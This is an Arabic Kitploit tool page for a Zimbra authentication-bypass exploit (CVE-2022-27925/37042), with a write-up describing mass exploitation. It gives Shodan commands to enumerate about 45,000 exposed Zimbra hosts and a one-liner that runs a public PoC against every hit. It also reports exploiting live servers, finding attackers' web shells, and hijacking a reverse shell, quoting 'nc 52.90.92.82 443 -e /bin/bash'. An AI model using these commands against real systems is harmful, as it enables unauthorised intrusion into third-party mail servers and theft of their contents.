Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/jam620/zimbra
الاستطلاعتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبCTFالتعلم والتعليم
GitHubjam620/zimbra

Zimbra

CVE-2022-27925

عرض المستودع
81منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال نشط على Zimbra CVE-2022-37042 (RCE غير مصادق عليه)

بدأ البحث التالي بمحاولة فهم الـ POC الخاصة بالعديد من المستودعات على GitHub التي شاركها العديد من الباحثين، وانتهى بمفاجأة مثيرة سأشاركها في الفقرات التالية. في 10 أغسطس من هذا العام، نشرت مجموعة أبحاث الأمن Volexity على حسابها على twitter اكتشاف الاستغلال الجماعي لسويت ZCS (Zimbra Collaboration Server) الذي يسمح بتجاوز المصادقة، وأن ما يقرب من 1000 مثيل من Zimbra كانت مخترقة على مستوى العالم.

في البحث الذي قدمه زملاؤنا في Volexity عرضوا جزءًا من السجلات التي تم فحصها

root@kitploit:~
[attacker_ip] - - [30/Jun/2022:05:33:18 +0000] "POST [snipped]/service/extension/backup/mboximport?account-name=admin&ow=1&no-switch=true HTTP/1.0" 401 299 "[snipped]" "Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0" 7

وبالمثل، أوضحوا أن خطأ الكود كان يعود إلى الدالة doPost،

المشكلة في هذا الكود هي أنه يتم التحقق من المصادقة وتعيين رسالة خطأ، لكن لا يوجد بيان return. وهذا يعني أن الكود التالي سيستمر في التنفيذ بغض النظر عن حالة مصادقة المستخدم. وبمتابعة الدالة لأسفل، يحتاج المهاجم فقط إلى تعيين المعاملات الصحيحة في عنوان URL لاستغلال الثغرة.

بمجرد أن فهمنا الأسباب المحتملة وظهرت بعض الـ POCs، شرعنا في تنفيذ الاستغلال خطوة بخطوة، لكننا سنتحقق أولاً من الوضع باستخدام أداة greynoise

نلاحظ أنه بعد أكثر من شهر على نشر CVE-2022-27925 ما زالت الهجمات مستمرة

في Shodan يمكننا رؤية حوالي 45,223 تثبيتًا لـ Zimbra

المتطلبات

  1. VPS يفضَّل أن يكون Ubuntu Server 20.04
  2. حساب Shodan مهيأ لاستخدام CLI وAPI الخاصة به
  3. تثبيت docker
  4. تثبيت jq

POC

  1. تعداد الأهداف المحتملة

shodan download --limit -1 zimbra.json.gz http.favicon.hash:"1624375939"

لنستعرض النتائج

shodan parse --fields ip_str,port --separator , zimbra.json.gz > zimbra.txt

لنراجع البيانات قليلاً ونمنحها التنسيق اللازم لأتمتة الاختبارات

نحلل البيانات لنتمكن من استخدام أداة عبر الإنترنت

سنستخدم httpx داخل docker

نقوم بتنزيل الـ POC من GitHub

git clone https://github.com/vnhacker1337/CVE-2022-27925-PoC

نجرب الأمر الأحادي (oneliner) مع الـ PoC، ومن المهم الإشارة إلى أنه يجب نقل الملف الذي تم تحليله إلى مجلد الـ PoC أو استدعاؤه بالمسار المطلق، ويمكننا أيضًا استخدام تفريغ Shodan

root@kitploit:~
cat zimbra.json | jq -r '.hostnames[]' | docker run -i projectdiscovery/httpx -silent | xargs -I@ sh -c 'python3 zimbra-exploit.py @ 313.zip' | egrep -v '404|401|405|200'

خلال هذا الاختبار، ظهر أن العديد من الأهداف تمت معالجتها بالفعل

أخيرًا حصلنا على نتيجة

  1. APT وbotnets وransomware

بمجرد استغلال الثغرة، لاحظنا ملفات عبارة عن سكربتات APT لسرقة المعلومات والتجهيز للابتزاز

الملف الخبيث gift

ملف النسخ الاحتياطي واستخراج البيانات

أحد المسارات التي عثرنا عليها كان يحتوي على عدة ويب شيلات

/opt/zimbra/jetty_base/webapps/zimbraAdmin/

أظهر تحليل العمليات الجارية أنه تم تثبيت cronjobs لتعبئة رسائل البريد الإلكتروني

ملاحظة: ما يلي تم تنفيذه لأغراض تعليمية وكنوع من العمل الحسن

  1. الاستيلاء على الـ shell المثبتة من قبل الـ APT

بمجرد تحديد تنزيل netcat، قمنا بالاستيلاء على جلسة المهاجمين، ولوحظ استخدام netcat ./nc 52.90.92.82 443 -e /bin/bash

imagen18 imagen19

ثغرة تم الإبلاغ عنها علنًا منذ أكثر من 30 يومًا ما زالت سارية عند كتابة هذا المقال، وتجدر الإشارة إلى أنه تم إبلاغ المتضررين دون جدوى بسبب استمرار نشاط الثغرة.

تنزيل الأداة